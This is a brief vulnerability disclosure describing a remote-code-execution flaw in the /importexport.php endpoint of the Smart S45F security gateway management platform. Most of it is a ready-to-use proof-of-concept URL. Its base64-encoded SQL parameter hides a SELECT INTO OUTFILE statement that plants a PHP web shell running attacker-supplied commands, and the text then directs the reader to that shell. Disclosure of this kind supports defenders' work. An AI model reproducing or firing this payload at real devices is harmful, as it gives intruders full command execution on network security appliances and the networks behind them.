The Smart S45F multi-service security gateway intelligent management platform has an rce injection vulnerability
official website:https://www.byzoro.com/
version:Smart S45F
Vulnerability location:/importexport.php
Construct the POC and perform the download
https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql
Access /app/sec.php to get the webshell.